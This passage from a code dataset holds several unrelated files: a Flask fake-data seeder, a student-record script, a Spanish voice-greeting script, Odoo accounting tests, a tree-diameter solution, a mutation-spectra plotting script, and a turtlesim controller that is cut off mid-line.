IntegrityError\nfrom api.models import User, Post, follower, Comment, Notification, Task, assignment\nfrom faker import Faker\nfrom flask import current_app\nfrom secrets import randbelow\n\n\ndef fake_users(count=10): # nosec\n    fake = Faker()\n    u = User(\n        username='username',\n        password='password',\n        email=current_app.config['MAIL_FOR_TEST_OR_DEBUG'] or 'test@test.gr',\n        bitcoin_address=fake.md5(),\n        confirmed=True,\n        name=fake.name(),\n        location=fake.city(),\n        member_since=fake.past_date())\n    db.session.add(u)\n    print('Default user-admin: \"username:password\"')\n    for i in range(count):\n        print('Generating fake user %d' % i, end=\"\\r\")\n        u = User(\n            username=fake.user_name(),\n            email=fake.email(),\n            bitcoin_address=fake.md5(),\n            password='password',\n            confirmed=True,\n            name=fake.name(),\n            location=fake.city(),\n            member_since=fake.past_date())\n        db.session.add(u)\n    try:\n        db.session.commit()\n    except IntegrityError:\n        db.session.rollback()\n\n\ndef fake_follows(count=100): # nosec\n    user_count = User.query.count()\n    for i in range(count):\n        print('Generating fake follow %d' % i, end=\"\\r\")\n        u1 = User.query.offset(randbelow(user_count)).first()\n        u2 = User.query.offset(randbelow(user_count)).first()\n        db.session.execute(follower.insert().values(\n            follower_id=u1.id,\n            followed_id=u2.id\n        ))\n        try:\n            db.session.commit()\n        except IntegrityError:\n            db.session.rollback()\n\n\ndef fake_posts(count=20): # nosec\n    fake = Faker()\n    user_count = User.query.count()\n    for i in range(count):\n        print('Generating fake post %d' % i, end=\"\\r\")\n        u = User.query.offset(randbelow(user_count)).first()\n        p = Post(\n            body=fake.text(),\n            timestamp=fake.past_date(),\n            user_id=u.id\n        )\n        db.session.add(p)\n        try:\n            db.session.commit()\n        except IntegrityError:\n            db.session.rollback()\n\n\ndef fake_comments(count=50): # nosec\n    fake = Faker()\n    user_count = User.query.count()\n    post_count = Post.query.count()\n    for i in range(count):\n        print('Generating fake comments %d' % i, end=\"\\r\")\n        u = User.query.offset(randbelow(user_count)).first()\n        p = Post.query.offset(randbelow(post_count)).first()\n        c = Comment(\n            body=fake.text(),\n            timestamp=fake.past_date(),\n            user_id=u.id,\n            post_id=p.id\n        )\n        db.session.add(c)\n        try:\n            db.session.commit()\n        except IntegrityError:\n            db.session.rollback()\n\n\ndef fake_notifications(count=50): # nosec\n    fake = Faker()\n    user_count = User.query.count()\n    for i in range(count):\n        print('Generating fake notifications %d' % i, end=\"\\r\")\n        u = User.query.offset(randbelow(user_count)).first()\n        n = Notification(user_id=u.id, body=fake.text(),\n            timestamp=fake.past_date())\n        db.session.add(n)\n        try:\n            db.session.commit()\n        except IntegrityError:\n            db.session.rollback()\n
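\n\n# Hedged usage note (assumed workflow, not part of the original module): these\n# seeders are meant to be run from an application shell, e.g. fake_users(25)\n# followed by fake_follows() and fake_posts(); users must exist before\n# follows, posts and comments can reference them.\n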
db.session.rollback()\n\n \ndef fake_tasks(count=50): # nosec\n    fake = Faker()\n    user_count = User.query.filter_by().count()\n    for i in range(count):\n        print('Generating fake task %d' % i, end=\"\\r\")\n        assigneed_from = User.query.offset(randbelow(user_count)).first()\n        assigned_to = User.query.offset(randbelow(user_count)).first()\n        t = Task(\n            name=fake.bs(),\n            description=fake.text(),\n            value=float(fake.pricetag().replace('$', '').replace(',', '')),\n            url=fake.url(),\n            timestamp=fake.past_date(),\n            due_date=fake.future_date(),\n            assignee_id=assigneed_from.id,\n        )\n        db.session.add(t)\n        db.session.commit()\n        db.session.execute(assignment.insert().values(\n            task_id=t.id,\n            assigned_id=assigned_to.id,\n        ))\n        try:\n            db.session.commit()\n        except IntegrityError:\n            db.session.rollback()","repo_name":"Haki-Malai/arctic-fox","sub_path":"backend/api/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"70524307918","text":"import read_file as Rf\nimport write_file as Wf\nimport tishi as ts\n#import get_path\ndef shan_chu():\n\t'''\n\t删除学生条目\n\t'''\n\tl = Rf.read_file()\n#\tprint(l)\n\tsc = input('输入需要删除的学生的姓名:')\n\n\tfor i in l:\n\t\tif i['姓名'] ==sc:\n\t\t\tprint('您要删除的是:',i['姓名'],'请确认(y/n)')\n\t\t\tqr = input()\n\t\t\tif qr =='y':\n\t\t\t\tshan_chu = l.pop(l.index(i))\n\t\t\t\tprint('删除了:',shan_chu)\n#\t\t\t\tfrom imp import reload\t\n#\t\t\t\treload(get_path)\n\t\t\t\tWf.write_file(l,'w')\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tprint('已放弃操作')\n\t\t\t\tts.tishi('即将返回目录',4)\n\t\t\t\treturn\n\tprint('没有此人')\n\tts.tishi('返回目录',5)\n","repo_name":"ga1008/Student-Information-Management-system-demo-","sub_path":"student_info/shan_chu.py","file_name":"shan_chu.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"73891441998","text":"import pyttsx3\r\nimport speech_recognition as sr\r\nimport regex as re\r\n\r\n#targets a name from voice\r\ndef identify_name(text):\r\n    name=None\r\n    patterns=[\"me llamo ([A-Za-z]+)\", \"mi nombre es ([A-Za-z]+)\", \"^([A-Za-z]+)$\"]\r\n    for pattern in patterns:\r\n        try:\r\n            # search one pattern at a time and stop at the first match\r\n            name=re.findall(pattern, text)[0]\r\n            break\r\n        except IndexError:\r\n            continue\r\n\r\n    if name is None:\r\n        print(\"No me ha dicho su nombre\")\r\n\r\n    return name\r\n\r\n#starts the engine\r\ndef initialize_engine():\r\n    engine=pyttsx3.init()\r\n    engine.setProperty(\"rate\", 120)\r\n    engine.setProperty(\"voice\", \"spanish\")\r\n    return engine\r\n\r\n#hearing function and turns it into text\r\ndef recognize_voice(r):\r\n    with sr.Microphone() as source:\r\n        print(\"Puedes hablar...\")\r\n        audio=r.listen(source)\r\n        text=r.recognize_google(audio, language=\"es-ES\")\r\n    return text\r\n\r\n#main function\r\ndef main():\r\n\r\n    engine=initialize_engine()\r\n\r\n    engine.say(\"Hola, como te llamas\")\r\n    engine.runAndWait()\r\n\r\n    r=sr.Recognizer()\r\n    text=recognize_voice(r)\r\n    name=identify_name(text)\r\n\r\n    if name:\r\n        engine.say(\"Encantado de conocerte,{}\".format(name))\r\n    else:\r\n        engine.say(\"no te entiendo mi loco\")\r\n    engine.runAndWait()\r\n\r\n\r\nif __name__==\"__main__\":\r\n    main()","repo_name":"RjCastro0/Python-Portfolio","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"5505045375","text":"from odoo.tests.common import 
TransactionCase\nfrom odoo import fields\nfrom odoo.exceptions import UserError, ValidationError\nfrom datetime import datetime, timedelta\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\n\n\nclass TestDichiarazioneIntento(TransactionCase):\n\n def _create_dichiarazione(self, partner, type_d):\n return self.env['dichiarazione.intento'].create({\n 'partner_id': partner.id,\n 'date': self.today_date.strftime('%Y-%m-%d'),\n 'date_start': self.today_date.strftime('%Y-%m-%d'),\n 'date_end': self.today_date.strftime('%Y-%m-%d'),\n 'taxes_ids': [(6, 0, [self.tax1.id])],\n 'limit_amount': 1000.00,\n 'fiscal_position_id': self.fiscal_position.id,\n 'type': type_d,\n 'telematic_protocol': '08060120341234567-000001',\n })\n\n def _create_invoice(self, partner, tax=False, date=False, in_type=False):\n invoice_date = date if date else self.today_date.strftime('%Y-%m-%d')\n payment_term = self.env.ref('account.account_payment_term_advance')\n invoice_line_data = [(0, 0, {\n 'product_id': self.env.ref('product.product_product_5').id,\n 'quantity': 10.00,\n 'account_id': self.a_cost.id if in_type else self.a_sale.id,\n 'name': 'test line',\n 'price_unit': 90.00,\n 'invoice_line_tax_ids': [(6, 0, [tax.id])] if tax else False,\n })]\n return self.env['account.invoice'].sudo().create({\n 'partner_id': partner.id,\n 'date_invoice': invoice_date,\n 'type': 'in_invoice' if in_type else 'out_invoice',\n 'name': 'Test Invoice for Dichiarazione',\n 'payment_term_id': payment_term.id,\n 'account_id': self.pay_account.id if in_type else self.account.id,\n 'invoice_line_ids': invoice_line_data,\n })\n\n def _create_refund(self, partner, tax=False, date=False, invoice=False):\n invoice_date = date if date else self.today_date.strftime('%Y-%m-%d')\n payment_term = self.env.ref('account.account_payment_term_advance')\n invoice_line_data = [(0, 0, {\n 'quantity': 1.00,\n 'account_id': self.a_sale.id,\n 'name': 'test refund line',\n 'price_unit': 100.00,\n 'invoice_line_tax_ids': [(6, 0, [tax.id])] if tax else False,\n })]\n return self.env['account.invoice'].sudo().create({\n 'partner_id': partner.id,\n 'date_invoice': invoice_date,\n 'type': 'out_refund',\n 'name': 'Test Refund for Dichiarazione',\n 'payment_term_id': payment_term.id,\n 'account_id': self.account.id,\n 'invoice_line_ids': invoice_line_data,\n 'refund_invoice_id': invoice.id,\n })\n\n def setUp(self):\n\n super(TestDichiarazioneIntento, self).setUp()\n self.tax_model = self.env['account.tax']\n self.account = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_receivable').id)\n ], limit=1)\n self.pay_account = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_payable').id)\n ], limit=1)\n self.a_sale = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_revenue').id)\n ], limit=1)\n self.a_cost = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_direct_costs').id)\n ], limit=1)\n self.today_date = fields.Date.today()\n self.partner1 = self.env.ref('base.res_partner_2')\n self.partner2 = self.env.ref('base.res_partner_12')\n self.partner3 = self.env.ref('base.res_partner_10')\n self.partner4 = self.env.ref('base.res_partner_4')\n self.tax22 = self.tax_model.create({\n 'name': '22%',\n 'amount': 22,\n })\n self.tax10 = self.tax_model.create({\n 'name': '10%',\n 'amount': 10,\n })\n self.tax2 = self.tax_model.create({\n 'name': '2%',\n 'amount': 
2,\n })\n self.tax1 = self.tax_model.create({\n 'name': 'FC INC',\n 'amount': 0,\n 'price_include': True,\n })\n self.fiscal_position = self.env[\n 'account.fiscal.position'].sudo().create({\n 'name': 'Dichiarazione Test',\n 'valid_for_dichiarazione_intento': True,\n 'tax_ids': [(0, 0, {\n 'tax_src_id': self.tax10.id,\n 'tax_dest_id': self.tax1.id,\n })]\n })\n self.fiscal_position_with_wrong_taxes = self.env[\n 'account.fiscal.position'].sudo().create({\n 'name': 'Dichiarazione Test Wrong',\n 'valid_for_dichiarazione_intento': True,\n 'tax_ids': [(0, 0, {\n 'tax_src_id': self.tax10.id,\n 'tax_dest_id': self.tax22.id,\n })]\n })\n self.fiscal_position2 = self.env[\n 'account.fiscal.position'].sudo().create({\n 'name': 'Dichiarazione Test 2',\n 'valid_for_dichiarazione_intento': False,\n 'tax_ids': [(0, 0, {\n 'tax_src_id': self.tax22.id,\n 'tax_dest_id': self.tax10.id,\n })]\n })\n\n self.dichiarazione1 = self._create_dichiarazione(self.partner1, 'out')\n self.dichiarazione2 = self._create_dichiarazione(self.partner2, 'out')\n self.dichiarazione3 = self._create_dichiarazione(self.partner2, 'out')\n self.env['dichiarazione.intento.yearly.limit'].create({\n 'year': self.today_date.year,\n 'limit_amount': 50000.0,\n 'company_id': self.env.user.company_id.id,\n })\n self.dichiarazione4 = self._create_dichiarazione(self.partner4, 'in')\n self.invoice1 = self._create_invoice(self.partner1)\n self.invoice1.journal_id.update_posted = True\n self.invoice2 = self._create_invoice(self.partner1, tax=self.tax1)\n self.invoice3 = self._create_invoice(self.partner1, tax=self.tax1)\n self.invoice_without_valid_taxes = self._create_invoice(\n self.partner1, tax=self.tax2)\n future_date = datetime.today() + timedelta(days=10)\n future_date = future_date.strftime(DEFAULT_SERVER_DATE_FORMAT)\n self.invoice_future = self._create_invoice(self.partner1,\n date=future_date,\n tax=self.tax1)\n self.refund1 = self._create_refund(self.partner1, tax=self.tax1,\n invoice=self.invoice2)\n self.invoice4 = self._create_invoice(self.partner3, tax=self.tax22)\n self.invoice4.fiscal_position_id = self.fiscal_position2.id\n self.invoice5 = self._create_invoice(self.partner4, tax=self.tax1, in_type=True)\n self.other_company = self.env['res.company'].create({\n 'name': 'other',\n })\n self.other_user = self.env['res.users'].create({\n 'name': \"User of other company\",\n 'login': \"other\",\n 'company_ids': [\n (4, self.other_company.id),\n ],\n 'company_id': self.other_company.id,\n })\n\n def test_dichiarazione_data(self):\n self.assertTrue(self.dichiarazione1.number)\n\n def test_costraints(self):\n with self.assertRaises(ValidationError):\n self.dichiarazione1.fiscal_position_id = \\\n self.fiscal_position_with_wrong_taxes.id\n\n def test_get_valid(self):\n dichiarazione_model = self.env['dichiarazione.intento'].sudo()\n self.assertFalse(dichiarazione_model.get_valid())\n records = dichiarazione_model.get_valid(\n type_d='out', partner_id=self.partner1.id, date=self.today_date)\n self.assertEquals(len(records), 1)\n records = dichiarazione_model.get_valid(\n type_d='out', partner_id=self.partner2.id, date=self.today_date)\n self.assertEquals(len(records), 2)\n\n def test_dichiarazione_state_change(self):\n self.assertEqual(self.dichiarazione1.state, 'valid')\n # ----- Close dichiarazione by moving end date before today\n previuos_date = datetime.today() - timedelta(days=10)\n self.dichiarazione1.date_start = previuos_date.strftime(\n DEFAULT_SERVER_DATE_FORMAT)\n self.dichiarazione1.date_end = previuos_date.strftime(\n 
DEFAULT_SERVER_DATE_FORMAT)\n self.assertEqual(self.dichiarazione1.state, 'expired')\n\n def test_invoice_validation_with_no_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice1.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n self.invoice_future.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n self.invoice_without_valid_taxes.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n\n def test_invoice_reopen_with_no_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice1.action_invoice_open()\n self.invoice1.action_invoice_cancel()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n\n def test_invoice_validation_under_dichiarazione_limit(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice2.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertNotEqual(previous_used_amount, post_used_amount)\n\n def test_invoice_validation_over_dichiarazione_limit(self):\n self.invoice2.action_invoice_open()\n with self.assertRaises(UserError):\n self.invoice3.action_invoice_open()\n\n def test_invoice_reopen_with_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice2.action_invoice_open()\n self.invoice2.action_invoice_cancel()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n\n def test_refund(self):\n self.invoice2.action_invoice_open()\n previous_used_amount = self.dichiarazione1.used_amount\n self.refund1.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertNotEqual(previous_used_amount, post_used_amount)\n\n def test_refund_with_amount_bigger_than_residual(self):\n self.invoice2.action_invoice_open()\n self.refund1.invoice_line_ids[0].quantity = 10\n\n # Check that base amount has been updated\n self.assertNotEqual(self.refund1.tax_line_ids[0].base, 1000)\n self.refund1.tax_line_ids._compute_base_amount()\n self.assertEqual(self.refund1.tax_line_ids[0].base, 1000)\n\n # Refund goes over plafond: 100 + 1000 > 1000\n self.assertEqual(self.dichiarazione1.available_amount, 100)\n self.assertEqual(self.refund1.amount_untaxed, 1000)\n self.assertEqual(self.dichiarazione1.limit_amount, 1000)\n with self.assertRaises(UserError):\n self.refund1.action_invoice_open()\n\n def test_fiscal_position_no_dichiarazione(self):\n self.invoice4._onchange_date_invoice()\n self.assertEqual(self.invoice4.fiscal_position_id.id, self.fiscal_position2.id)\n\n def test_invoice_vendor_with_no_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione4.used_amount\n self.assertAlmostEqual(previous_used_amount, 0.0, 2)\n self.invoice5.action_invoice_open()\n post_used_amount = self.dichiarazione4.used_amount\n self.assertAlmostEqual(post_used_amount, 900.0, 2)\n\n def test_copy_dichiarazione_in(self):\n dichiarazione_copy = self.dichiarazione4.copy()\n self.assertTrue(dichiarazione_copy)\n\n def test_multi_company(self):\n \"\"\"Check that a user can only see and create declarations in his company.\"\"\"\n self.env = self.env(user=self.other_user)\n declaration_model = 
self.env['dichiarazione.intento']\n\n # See only declarations in current company\n self.assertFalse(declaration_model.search_count([]))\n\n # Created declaration is in current company\n declaration = self._create_dichiarazione(self.partner1, 'out')\n self.assertEqual(declaration_model.search([]), declaration)\n self.assertEqual(self.env.user.company_id, declaration.company_id)\n","repo_name":"decodio/oca12","sub_path":"l10n_it_dichiarazione_intento/tests/test_dichiarazione_intento.py","file_name":"test_dichiarazione_intento.py","file_ext":"py","file_size_in_byte":13100,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"39529776683","text":"from core.entity.player import Player\n\n\nclass Team:\n def __init__(self, number: int):\n self.number = number\n self.name = None\n self.color = None\n\n self.players = {\n \"1\": Player(1),\n \"2\": Player(2)\n }\n","repo_name":"zinvapel/kivy-croco-game","sub_path":"core/entity/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26891077996","text":"import sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(10**6)\nn = int(input())\n\ngraph = defaultdict(list)\nfor _ in range(n-1):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\n graph[b].append((a, c))\n\n\ndef isLeafNode(visited, now):\n isLeafNode = True\n for info in graph[now]:\n nxt, _ = info\n if not visited[nxt]:\n isLeafNode = False\n break\n return isLeafNode\n\nvisited = [False] * (n+1)\nvisited[1] = True\n\ndef findStart(now, total):\n start= (1,0)\n if isLeafNode(visited, now):\n if start[1] < total:\n start = (now, total)\n return start\n\n for info in graph[now]:\n nxt, cost = info\n if visited[nxt]: continue\n visited[nxt] = True\n temp = findStart(nxt, total+cost)\n if start[1] < temp[1]:\n start = temp\n\n\n return start\n\nstart = findStart(1, 0)\n\nvisited = [False] * (n+1)\nvisited[start[0]] = True\ndef DFS(now, total):\n result = 0\n if isLeafNode(visited, now):\n result = max(result, total)\n return result\n\n for info in graph[now]:\n nxt, cost = info\n if visited[nxt]: continue\n visited[nxt] = True\n result = max(result, DFS(nxt, total+cost))\n\n return result\n\nprint(DFS(start[0], 0))\n\n","repo_name":"JunHyxxn/BOJ","sub_path":"DFS_BFS/Quiz_1967_트리의 지름.py","file_name":"Quiz_1967_트리의 지름.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"22327799564","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom loess.loess_1d import loess_1d\nimport argparse\nimport matplotlib\nimport sys\n\nfrom util import *\n\nplt.rcParams[\"legend.title_fontsize\"] = \"xx-small\"\nmatplotlib.rc(\"xtick\", labelsize=5)\nmatplotlib.rc(\"ytick\", labelsize=5)\nmatplotlib.rc(\"axes\", labelsize=6)\nmatplotlib.rc(\"axes\", titlesize=6)\nmatplotlib.rc(\"legend\", fontsize=6)\n\npops = [\"ALL\", \"AFR\", \"EAS\", \"EUR\", \"SAS\"]\n\nclasses = [\n \"A>C\",\n \"A>G\",\n \"A>T\",\n \"C>A\",\n \"C>G\",\n \"C>T\",\n]\n\nfrom bokeh.palettes import Dark2\nfrom bokeh.palettes import Bright\n\n# D = Dark2[6]\n# colors = [D[1], D[2], D[5], D[4], D[3], D[0]]\ncolors = Bright[6]\n\n\ndef make_parser():\n ADHF = argparse.ArgumentDefaultsHelpFormatter\n parser = argparse.ArgumentParser(\"plot_spectra_history.py\", formatter_class=ADHF)\n optional = 
parser.add_argument_group(\"Optional\")\n parser.add_argument(\n \"--dataset\",\n \"-d\",\n type=str,\n required=True,\n )\n optional.add_argument(\"--max_age\", \"-m\", default=10000, type=int)\n optional.add_argument(\n \"--singletons\",\n \"-s\",\n action=\"store_true\",\n )\n optional.add_argument(\n \"--frequency\",\n \"-f\",\n type=float,\n default=0.98,\n )\n optional.add_argument(\n \"--num_bins\",\n \"-b\",\n type=int,\n default=100,\n )\n optional.add_argument(\n \"--CI\",\n action=\"store_true\",\n )\n return parser\n\n\ndef get_relative_spectra_histories(\n dataset,\n pop,\n max_age=10000,\n keep_singletons=False,\n max_frequency=0.98,\n num_bins=100,\n CI=False,\n):\n if num_bins != 100:\n assert CI is False\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.num_bins.{num_bins}.csv\"\n elif CI is True:\n assert num_bins == 100\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.CI.csv\"\n elif num_bins == 100:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.csv\"\n else:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.num_bins.{num_bins}.csv\"\n df = pd.read_csv(fname, sep=\"\\t\")\n y = np.zeros((num_bins, len(classes)))\n for i, c in enumerate(classes):\n y[:, i] = df[c]\n for j in range(len(y)):\n y[j] /= y[j].sum()\n spectra = {}\n for i, c in enumerate(classes):\n spectra[c] = y[:, i]\n bin_mids = np.array((df[\"Min\"] + df[\"Max\"]) / 2)\n return spectra, bin_mids\n\n\ndef get_relative_spectra_histories_extra_classes(\n dataset,\n pop,\n max_age=10000,\n keep_singletons=False,\n max_frequency=0.98,\n num_bins=100,\n CpG=False,\n):\n if num_bins == 100:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.csv\"\n else:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.num_bins.{num_bins}.csv\"\n df = pd.read_csv(fname, sep=\"\\t\")\n additional_classes = [\"ACC>ATC\", \"CCC>CTC\", \"TCC>TTC\", \"TCT>TTT\"]\n if CpG:\n additional_classes.append(\"CpG\")\n classes_all = classes + additional_classes\n y = np.zeros((num_bins, len(classes_all)))\n for i, c in enumerate(classes_all):\n y[:, i] = df[c]\n for j in range(len(y)):\n y[j] /= y[j].sum()\n spectra = {}\n for i, c in enumerate(classes_all):\n spectra[c] = y[:, i]\n bin_mids = np.array((df[\"Min\"] + df[\"Max\"]) / 2)\n return spectra, bin_mids\n\n\ndef plot_spectra(\n dataset,\n max_age,\n keep_singletons,\n max_frequency,\n fout=None,\n show=False,\n CI=False,\n num_bins=100,\n):\n spectra = {}\n bin_mids = {}\n for p in pops:\n spectra[p], bin_mids[p] = get_relative_spectra_histories(\n dataset,\n p,\n max_age=max_age,\n keep_singletons=keep_singletons,\n max_frequency=max_frequency,\n CI=CI,\n num_bins=num_bins,\n )\n anchor = {c: spectra[\"ALL\"][c][0] for c in classes}\n fig = plt.figure(figsize=(8, 5))\n fig.clf()\n for k, p in enumerate(pops):\n ax = plt.subplot(2, 3, k + 1)\n for j, c in enumerate(classes):\n y = (spectra[p][c] - anchor[c]) * 100\n ax.plot(bin_mids[p], y, c=colors[j], lw=0.1, label=None)\n for j, c in enumerate(classes):\n y = (spectra[p][c] - anchor[c]) * 100\n xout, yout, wout = loess_1d(bin_mids[p], y, frac=0.5, degree=2)\n ax.plot(xout, yout, 
c=colors[j % 6], lw=2.0, label=c)\n ax.set_xscale(\"log\")\n if k == 4:\n ax.legend(ncol=1, fontsize=6, bbox_to_anchor=(1.0, 1.0))\n ax.set_title(p)\n ax.set_ylabel(\"Percent change\")\n ax.set_xlabel(\"Generations ago\")\n\n fig.tight_layout()\n if fout is not None:\n plt.savefig(fout)\n if show:\n plt.show()\n\n\ndef plot_spectra_extra_classes(\n dataset,\n max_age,\n keep_singletons,\n max_frequency,\n fout=None,\n show=False,\n CpG=False,\n):\n spectra = {}\n bin_mids = {}\n for p in pops:\n spectra[p], bin_mids[p] = get_relative_spectra_histories_extra_classes(\n dataset, p, max_age=max_age, keep_singletons=keep_singletons, CpG=CpG\n )\n spectra[p][\"C>T (pulse)\"] = (\n spectra[p][\"ACC>ATC\"]\n + spectra[p][\"CCC>CTC\"]\n + spectra[p][\"TCC>TTC\"]\n + spectra[p][\"TCT>TTT\"]\n )\n for c in [\"ACC>ATC\", \"CCC>CTC\", \"TCC>TTC\", \"TCT>TTT\"]:\n spectra[p].pop(c)\n\n classes_all = classes + [\"C>T (pulse)\"]\n if CpG:\n classes_all.append(\"CpG\")\n\n anchor = {c: spectra[\"ALL\"][c][0] for c in classes_all}\n colors = list(Bright[6]) + [\"black\", \"gray\"]\n fig = plt.figure(figsize=(8, 5))\n fig.clf()\n for k, p in enumerate(pops):\n ax = plt.subplot(2, 3, k + 1)\n for j, c in enumerate(classes_all):\n y = (spectra[p][c] - anchor[c]) * 100\n ax.plot(bin_mids[p], y, c=colors[j], lw=0.1, label=None)\n for j, c in enumerate(classes_all):\n y = (spectra[p][c] - anchor[c]) * 100\n xout, yout, wout = loess_1d(bin_mids[p], y, frac=0.5, degree=2)\n ax.plot(xout, yout, c=colors[j], lw=2.0, label=c)\n ax.set_xscale(\"log\")\n if k == 4:\n ax.legend(ncol=1, fontsize=6, bbox_to_anchor=(1.0, 1.0))\n ax.set_title(p)\n ax.set_ylabel(\"Percent change\")\n ax.set_xlabel(\"Generations ago\")\n\n fig.tight_layout()\n if fout is not None:\n plt.savefig(fout)\n if show:\n plt.show()\n\n\nif __name__ == \"__main__\":\n parser = make_parser()\n args = parser.parse_args(sys.argv[1:])\n (dataset, max_age, keep_singletons, max_frequency, num_bins, CI) = (\n args.dataset,\n args.max_age,\n args.singletons,\n args.frequency,\n args.num_bins,\n args.CI,\n )\n if num_bins != 100:\n assert CI is False\n assert keep_singletons is False\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.num_bins.{num_bins}.pdf\"\n elif CI:\n assert keep_singletons is False\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.CI.pdf\"\n elif keep_singletons:\n fname = (\n f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.singletons.pdf\"\n )\n elif max_frequency != 0.98:\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.max_freq.{max_frequency}.pdf\"\n else:\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.pdf\"\n plot_spectra(\n dataset,\n max_age,\n keep_singletons,\n max_frequency,\n fout=fname,\n show=False,\n CI=CI,\n num_bins=num_bins,\n )\n","repo_name":"apragsdale/dated-mutation-spectra","sub_path":"plot_spectra_history.py","file_name":"plot_spectra_history.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"75115860239","text":"import rclpy\nimport rclpy.node\nimport logging\nimport random\n\nfrom rclpy.node import Node\nfrom rclpy.action import ActionClient\nfrom concurrent.futures import Future\n\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\nfrom turtlesim.action import RotateAbsolute\n\nimport math\n\nclass TurtlesimController(Node):\n def __init__(self):\n super().__init__('turtlesim_controller')\n\n self.state: 
str = 'forward'\n\n self.goal_future: Future = None\n\n self.x: float = 0\n self.y: float = 0\n self.theta: float = 0\n self.result_response: float = 0\n self.action_working: bool = False\n\n self.declare_parameter('stop', 'false')\n\n self.timer = self.create_timer(0.5, self.timer_callback)\n self.logger = self.get_logger()\n\n self.publisher = self.create_publisher(Twist, 'turtle1/cmd_vel', 10)\n self.subscriber = self.create_subscription(Pose, 'turtle1/pose', self.pose_listener, 10)\n self.action_client = ActionClient(self, RotateAbsolute, 'turtle1/rotate_absolute')\n\n def send_goal(self, grade):\n goal = RotateAbsolute.Goal()\n goal.theta = math.radians(grade)\n\n self.action_client.wait_for_server()\n\n self.goal_future = self.action_client.send_goal_async(goal, feedback_callback=self.feedback_callback)\n self.goal_future.add_done_callback(self.goal_response)\n\n \n\n def goal_response(self, future):\n goal_handle = future.result()\n if not goal_handle.accepted:\n self.get_logger().info('Goal rejected :(')\n return\n\n self.get_logger().info('Goal accepted :)')\n\n self._get_result_future = goal_handle.get_result_async()\n self._get_result_future.add_done_callback(self.get_result_callback)\n\n def get_result_callback(self, future):\n self.result = future.result().result\n self.get_logger().info('Result: {0}'.format(self.result.delta))\n self.result_response = self.result.delta\n # rclpy.shutdown()\n\n def feedback_callback(self, msg):\n self.feedback = msg.feedback\n self.logger.info(f\"feedback: {self.feedback}\")\n\n def timer_callback(self):\n stop_param = self.get_parameter('stop').get_parameter_value().string_value\n degree: int = random.randint(1, 360)\n\n if (stop_param == 'false'):\n pub_msg = Twist()\n if self.x >= 11 or self.x <= 0 or self.y >= 11 or self.y <= 0:\n self.state = 'backward'\n elif self.state == 'backward':\n self.state = 'rotate'\n else:\n self.state == 'forward'\n\n ################ State Machine #####################\n if self.state == 'backward':\n pub_msg.linear.x = -2.0\n self.publisher.publish(pub_msg)\n self.logger.info(f\"wall: x: {pub_msg}\")\n if self.state == 'forward':\n pub_msg.linear.x = 1.0\n self.publisher.publish(pub_msg)\n self.logger.info(f\"x: 